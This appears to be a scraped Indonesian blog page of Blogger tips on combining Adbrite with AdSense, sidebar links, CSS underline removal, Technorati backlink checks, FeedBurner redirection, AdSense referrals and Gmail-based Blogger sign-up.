1. Memasang iklan Adbrite di blog yg ada iklan Adsense TIDAK APA-APA alias DIPERBOLEHKAN oleh Google Adsense. Google Adsense juga memperbolehkan memasang iklan Chitika dan Ad-text link dipasang di blog atau website yg sama. Saya sudah mengkonfirmasi hal ini langsung pada manajer Google Adsense.

2. Penghasilan dari Iklan Adbrite masih kalah jauh dg Google Adsense. Namun, bagi blogger yg ngeblog dalam bahasa Indonesia tentu lebih baik memasang iklan Adbrite daripada tidak sama sekali, sambil menunggu Google Adsense dapat menerima iklan pada blog yg berbahasa Indonesia. Toh tujuan utama ngeblog adalah mengasah dan melatih kemampuan menulis serta melepaskan uneg-uneg, bukan berniat untuk cari keuntungan besar, bukan?

3. Hal yg tak kalah pentingnya adalah dg ikut program Adbrite, blog kita akan mendapat promosi gratis dari Adbrite yakni dg mengiklankannya di direktori Adbrite untuk menarik para pemasang iklan. Jadi, kita dapat keuntungan tambahan di sini: promosi blog gratis.[]

Membuat Link di Sidebar

Sewaktu kita jalan-jalan ke blog orang lain atau dikenal dg istilah blogwalking, terkadang kita melihat blog yg isinya menarik dan ingin kita memasang link blog tsb di blog kita tapi tidak tahu caranya. Apabila Anda termasuk golongan ini, ikuti cara sederhana sebagai berikut:

1. Sign-in ke blogger.com seperti biasa.
2. Klik menu TEMPLATE.
3. Di sebagian template blogger / blogspot biasanya sudah ada contoh link di sidebar seperti di bawah ini:



Links

• Google News
• Edit-Me
• Edit-Me

Apabila template yg Anda pilih kebetulan ada kode seperti di atas, maka Anda tinggal merubah isinya dg alamat URL blog lain yg ingin Anda link.

Akan tetapi apabila tidak ada, maka Anda tinggal meng-copy kode di atas dan taruh di sidebar dan isi dg alamat URL blog teman-teman Anda.

Tidak ada batasan berapa jumlah link yg ingin Anda masukkan, umumnya blog yg ingin dilink adalah blog yg isinya Anda sukai atau yg juga memasang link blog Anda yg dikenal dg link-exchange atau pertukaran link yg umum dikenal dalam dunia blog (blogosphere).

Menghilangkan Underline Link

Pada sebagian template blogspot, tulisan yg mengandung link ada underline (garis bawah)-nya. Bagi sebagian orang, mungkin garis bawah pada link itu tidak mengganggu. Namun bagi Anda yg agak peduli dengan estetika, garis bawah pada link itu agak mengurangi keindahan blog. Bila Anda termasuk golongan ini, berikut tip cara menghilangkan underline (garis bawah) link.

1. Setelah login, klik TEMPLATE untuk blogger classic, atau klik LAYOUT/TEMPLATE –> EDIT HTML untuk blogger baru.

2. Cari kode berikut di bagian atas template di bawahnya
a:link {
color:$linkcolor;
text-decoration:none;
} a:visited {
color:$visitedlinkcolor;
text-decoration:none;
}

a:hover {
color:$titlecolor;
text-decoration:underline;

3. Yang membuat link di blog kita ada underline (garis bawah) atau tidak ada underline adalah sbb:
3.A. text-decoration:none; untuk membuat link tidak memakai underline
3.B. text-decoration:underline; untuk membuat link memaki underline.

Jadi, Anda tinggal merubah kode setelah “text-decoration:”

Jangan lupa setelah membuat perubahan, klik SAVE. Selesai.

Glossary:

1. a:link artinya link yang tampil di blog kita.
2. a:visited artinya link setelah diklik
3. a:hover artinya link ketika mouse kita arahkan ke link tsb.

Siapa Ngelink Blog Anda?

Sebenarnya soal ini sudah dibahas di sini, tapi untuk blogger baru yg mungkin belum sempat nengok artikel tsb berikut tip untuk tahu siapa yg ngelink blog Anda. Cara paling mudah adalah via Technorati.com. Tulis di browser Anda (Internet Explorer atau Firefox) begini:

http://technorati.com/search/site.blog.com
Ganti URL blog saya dg blog Anda. Hasilnya, Anda akan tahu siapa saja yg sudah ngelink ke blog Anda. Terjadinya perubahan jumlah yg ngelink biasanya setelah Anda mengupdate posting atau template blog.

Update: Bagi yang ngelink ke Blogger Indonesia, silahkan cek dulu di Technorati.Com. Apabila blog Anda sudah masuk sebagai blog yang ngelink ke Blogger Indonesia, maka yang perlu Anda lakukan adalah menunggu linkback darinya. Karena linkback akan dilakukan berdasarkan laporan Technorati. Jadi, Anda tak perlu memberi tahu.Sebaliknya, walaupun Anda laporan sudah melinkback Blogger Indonesia, tapi link Anda tidak ada di Technorati.com, blog Anda tidak akan dilinkback

Feed Burner dan Feed Blogger

Bagi yang sudah memanfaatkan feedburner untuk meningkatkan SEO (search engine optimization) feed blognya, ada kabar gembira. Saat ini, dengan diakuisisi-nya feedburner oleh Google, pemilik blogger.com, kita bisa mengintegrasikan feed blogger dg feedburner. Jadi, semua feed blogger akan diredirect ke feedburner. Ini tentu akan meningkatkan SEO blog kita. Caranya mudah sebagai berikut:

Syarat utama adalah Anda sudah punya account di feedburner.com, kalau belum silahkan daftar (sign-up/register) feed blogger Anda dulu di http://feedburner.com

1. Setelah login ke www.blogger.com, klik Setting –> Site Feed.
2. Ada menu “Post Feed Redirect URL” masukkan feedburner blog Anda di kotak yang tersedia di sebelah kanan. Feedburner blog ini misalnya adalah http://feeds.feedburner.com/mario_gagho
3. Meluncur ke bawah, klik menu Save Setting.
4. Selesai.

Google Adsense Referral

Setelah diterima menjadi anggota afiliasi Google Adsense, maka langkah kedua adalah memasang kode/script di blog kita. Ada tiga program dalam Google Adsense yg dapat kita manfaatkan. Salah satunya adalah Adsense Referral di mana kita diperbolehkan untuk mempromosikan empat produksi Google di blog kita yaitu Google Picasa, Google Adsense, Google Adwords dan Google Firefox.

Keuntungan Adsense Referral: Apabila ada seorang pengunjung blog Anda yg mendaftar program Google Adsense atau Google Adwords dll melalui atau dg cara mengklik banner atau link di blog kita, maka keuntungannya sbb:

1. Google Adsense: Kita akan mendapat U$ 100 (seratus dolar) apabila pendaftar Adsense dari blog kita itu mendapat hasil U$ 100 yg pertama;2. Google Adwords: Kita akan mendapat U$ 20 apabila pendaftar Adwords dari blog kita telah membelanjakan U$ 100 yg pertama.
3. Google Picasa: Kita akan mendapat U$ 10 cent sampai U$ 1 setiap kali ada yg mendownload program Google Picasa dg mengklik referral dari blog kita.
4. Google Firefox: Kita akan mendapat U$ 10 cent sampai U$ 1 setiap kali ada yg mendownload program Google Firefox dari blog kita.Cara mengambil kode referral:

1. Log-in ke Google Adsense dg email dan password Anda.
2. Klik menu AdSense Setup.
3. Klik menu Referral
4. Ada dua pilihan di situ yaitu menu Wizard dan Single Page, untuk pemula biar mudah klik menu Single Page
5. Klik atau kasih tanda cek/tik di menu Google Adsense, dan pilih link atau gambar di bawahnya yg sesuai dg selera Anda kemudian kasih tanda tik/cek di gambar atau link tsb.
6. Di bagian paling bawah halaman ada menu Get Button Code, copy kode tsb dan pasang di blog Anda. Selesai.
7. Kasih tanda tik/cek di referral berikutnya yaitu Google Adwords, dan ulangi langkah nomor 5 dan 6. Begitu juga untuk Picasa dan Firefox.

Catatan:
1. Program Adsense Referral ini bisa dipakai untuk blog dalam bahasa apa saja, termasuk bahasa Indonesia.
2. Keempat produk di atas hanya boleh dipasang masing-masing satu untuk setiap produk dalam setiap blog. Jadi, dalam setiap blog maksimum cuma ada 4 (empat) produk referral.
3. Untuk Referral button dan link text lihat contohnya di sebelah kanan halaman ini (di bawah menu Site Feed). Adsense referral berbentuk button/banner, sedang yg lain (Adwords, Picasa dan Firefox) dalam bentuk text-link.

Cara Daftar Blog di Blogger Baru

Cara Daftar Blog di Blogger Baru

Cara Daftar Blog di Blogger Beta
Sejak tanggal 19 Desember, Blogger baru yg terlahir pada 10 November dan berstatus Beta (masa percobaan) itu, sekarang sudah tidak Beta lagi dalam arti sudah operasional penuh. Dengan demikian, siapa saja yg daftar buat blog di blogger.com sejak 19 Desember akan otomatis terdaftar dalam blogger versi baru ini. Dan bagi pengguna blogger/blogspot lama sudah diberi pilihan untuk pindahan ke blogspot versi baru.

Hal penting bagi yg baru akan buat blog di blogger adalah sistem daftar/registrasi buat blognya sekarang harus memiliki akun/account gmail.com. Jadi, bagi Anda yg sudah punya email di gmail.com, tinggal langsung buka blogger.com, dan masukkan akun gmail dan password Anda di tempat login.

Sementara bagi yg belum punya email di gmail.com, Anda harus buat email dulu di gmail.com.

Komentar»